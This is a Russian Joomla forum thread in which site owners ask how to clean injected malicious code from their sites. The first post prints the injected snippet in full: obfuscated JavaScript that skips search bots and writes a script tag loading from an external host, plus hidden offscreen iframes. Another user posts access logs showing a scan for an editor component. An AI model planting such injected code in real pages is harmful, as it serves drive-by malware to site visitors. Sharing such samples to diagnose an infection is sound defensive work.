Joomla 1.5 Iframe с вредоносным кодом.

boneshaker · 25.11.2014

В коде сайта появился левый код (iframe) причём из кучи источников. Вопрос, как с этим справиться малой кровью. Разумеется поиск тотал командером вредных ссылок в коде не дал результатов.
вот кусок вредного кода :

Код (html):

<body id="page"><nofollow><noindex>

<script language="JavaScript">

{

if (self.parent.frames.length != 0)

self.parent.location="http://kharkov-online.ru"

}

var brs = window.navigator.userAgent; prnt = '0';

if (window.brs.indexOf("bot") >= 0) prnt = '1';

if (window.brs.indexOf("andex") >= 0) prnt = '2';

if (window.brs.indexOf("oogl") >= 0) prnt = '3';

if (prnt == '0') var prtone = "ip"+"t lan"+"gua"+"ge='"+"Ja"+"vaS"+"c"; var prttwo = "c='h"+"t"+"tp"+":/"+"/282mssnz.ns01.biz"+"/wp"+"fo"+"ot"+"e"+"r.p"+"hp"+"?i="+"23190"; var prtthree = "ip"+"t>";

document.write("<sc"+"r");

document.write(prtone);

document.write("ri"+"pt' s"+"r");

document.write(prttwo);

document.write("'>"+"<"+"/sc"+"r");

document.write(prtthree);

</script><script language="JavaScript" src="http://282mssnz.ns01.biz/wpfooter.php?i=23190"></script>

</noindex></nofollow><iframe style="width: 170px; height: 170px; position: absolute; left: -1070px; " src="http://r0236.rsdisp.ru/?in=40114"></iframe>

<iframe style="position: absolute; width: 177px; height: 177px; left: -1077px; " src="http://282mssnz.ns01.biz/?inid=23190&intime=665435789.5&fltr=1&nbz"></iframe><link rel="shortcut icon" href="http://www.tachos.ru/templates/mega_extramy/favicon.ico" type="image/x-icon">

А вот скриншот источников

Наши спонсоры

boneshaker · 04.03.2012

Вылечилось перезаливкой сайта, как предохраниться теперь?

OlegK · 04.03.2012

Ну для начала заменить пароли/логины.Может кому запретить рассылку об изменении доступа.

mallet · 17.03.2012

У меня та же фигня. Причем появилось впервые вчера на сайте под Joomla! 1.5, а сегодня на всех сайтах с этого аккаунта. Движки разные - WP, Mediawiki, Vam shop. Код проявляется под </html> (в джумле над <html>). Перекопка файловых систем ничего не дала, в логах вроде все чисто. Хотя нашел в логах такое:

Код (html):

**********ru *********** - - [16/Mar/2012:16:36:26 +0400] "GET /spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:26 +0400] "GET /cms/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:26 +0400] "GET /admin/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:26 +0400] "GET /admin/lib/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:26 +0400] "GET /public/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:26 +0400] "GET /modules/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /zm_cms/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /edit/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /plugins/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /lib/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /libs/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /abton/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /adm/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /admin/include/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /include/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /spaw/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /engine/libs/spaw/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /libs/spaw/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

**********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /admin/spaw/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

Но spaw у меня не стоит, поэтому я думаю, это не то.
Как решить проблему без перезаливки?

Upd: Откатил на три дня назад - стало все ок, но ведь это ненадолго.

OlegK · 17.03.2012

А по датам изменения в файлах были?

mallet · 18.03.2012

Не, нигде не нашел. Если что-то и менялось, то дата осталась той же.

OlegK · 18.03.2012

Хм,а посмотреть логи доступа mysql/mysql.err / mysql.log

Войти или зарегистрироваться

Joomla 1.5 Iframe с вредоносным кодом.

boneshaker Недавно здесь

Наши спонсоры

boneshaker Недавно здесь

OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

mallet Недавно здесь

OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

mallet Недавно здесь

OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

Поделиться этой страницей

Войти или зарегистрироваться

Joomla 1.5 Iframe с вредоносным кодом.

boneshaker Недавно здесь

Наши спонсоры

boneshaker Недавно здесь

OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

mallet Недавно здесь

OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

mallet Недавно здесь

OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

Поделиться этой страницей

Быстрый поиск